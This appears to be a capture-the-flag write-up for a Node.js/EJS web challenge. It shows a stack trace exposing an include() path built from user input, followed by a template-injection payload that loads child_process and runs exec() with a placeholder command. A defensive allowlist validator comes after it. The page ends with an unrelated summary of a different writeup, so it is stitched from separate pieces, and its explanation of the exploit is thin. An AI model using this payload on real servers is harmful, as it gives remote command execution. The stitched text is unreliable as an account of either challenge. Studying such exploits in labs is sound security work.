# Catalog (easy) - Web Exploitation  
`author : ardhani`

```node  
Error: /app/views/cat.ejs:21  
19| </div>  
20| <div>  
>> 21| <%- include('descriptions/' + description) %>  
22| </div>  
23| </div>  
24| </main>

Could not find the include file "descriptions/asd"  
at getIncludePath (/app/node_modules/ejs/lib/ejs.js:185:13)  
at includeFile (/app/node_modules/ejs/lib/ejs.js:311:19)  
at include (/app/node_modules/ejs/lib/ejs.js:701:16)  
at eval ("/app/views/cat.ejs":24:17)  
at cat (/app/node_modules/ejs/lib/ejs.js:703:17)  
at tryHandleCache (/app/node_modules/ejs/lib/ejs.js:274:36)  
at exports.renderFile [as engine] (/app/node_modules/ejs/lib/ejs.js:491:10)  
at View.render (/app/node_modules/express/lib/view.js:135:8)  
at tryRender (/app/node_modules/express/lib/application.js:657:10)  
at Function.render (/app/node_modules/express/lib/application.js:609:3)  
```

The error shows `description` being concatenated into the EJS `include()` path, so we can input this payload:

```
<%=
function(){localLoad=global.process.mainModule.constructor._load;sh=localLoad("child_process").exec('COMMAND_HERE')}()
%>
```
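
The defensive counterpart to the template line in the trace, as an added example that is not part of the original writeup or the challenge source: it validates `description` before `cat.ejs` ever reaches `include('descriptions/' + description)`. The directory path, the sample names and the `catResponse` helper are assumptions made for illustration.

```javascript
const path = require('path');

// Assumption: partials sit next to cat.ejs, i.e. /app/views/descriptions/<name>.ejs
const VIEWS_DIR = '/app/views';
const DESCRIPTIONS_DIR = path.posix.join(VIEWS_DIR, 'descriptions');

// Constructed sample names; build this set once at startup from the real directory listing.
const KNOWN_DESCRIPTIONS = new Set(['persian', 'siamese', 'sphynx']);
const NAME_RE = /^[a-z0-9_-]{1,64}$/;

function resolveDescription(input) {
  // Express query parsing can yield arrays or objects, so check the type first.
  if (typeof input !== 'string') return { ok: false, reason: 'not-a-string' };
  // No dots, slashes or template delimiters: rejects traversal and markup in one rule.
  if (!NAME_RE.test(input)) return { ok: false, reason: 'bad-characters' };
  if (!KNOWN_DESCRIPTIONS.has(input)) return { ok: false, reason: 'unknown-name' };
  // Defence in depth: the resolved file must still sit inside the descriptions directory.
  const file = path.posix.resolve(DESCRIPTIONS_DIR, input + '.ejs');
  if (!file.startsWith(DESCRIPTIONS_DIR + '/')) return { ok: false, reason: 'outside-directory' };
  return { ok: true, description: input, file };
}

// Hypothetical handler core: decides what the route renders for a given query object.
function catResponse(query) {
  const result = resolveDescription(query.description);
  if (!result.ok) {
    // Log the reason server-side; the client gets a generic 404, not the EJS stack trace.
    return { status: 404, body: 'Not found', log: result.reason };
  }
  return { status: 200, view: 'cat', locals: { description: result.description } };
}
```

Returning a generic 404 also stops the verbose EJS error shown above, with its file paths and template source, from reaching the client.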

Original writeup (https://github.com/naufalardhani/ctf-journey/tree/main/Writeups/ctftime/m*ctf2023/web_catalog).

Author writeup. In short: two injections + meta-redirect + CSRF + weird user activation behavior with extension postMessage + scroll to text fragment + lazy-loading image.

Original writeup (https://dttw.tech/posts/B19RXWzYL).